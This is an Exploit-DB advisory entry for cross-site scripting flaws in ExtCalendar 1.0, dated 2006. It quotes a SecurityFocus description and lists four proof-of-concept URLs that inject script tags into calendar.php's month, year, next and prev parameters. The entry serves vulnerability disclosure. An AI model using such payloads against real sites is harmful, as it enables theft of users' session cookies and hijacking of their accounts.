Lucene search

K
exploitdbSoothackersEDB-ID:27443
HistoryMar 18, 2006 - 12:00 a.m.

Extcalendar 1.0 - Cross-Site Scripting

2006-03-1800:00:00
Soothackers
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/17146/info

ExtCalendar is prone to four cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script> 

http://www.example.com/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006 

http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script> 

http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>

AI Score

7.4

Confidence

Low

Related for EDB-ID:27443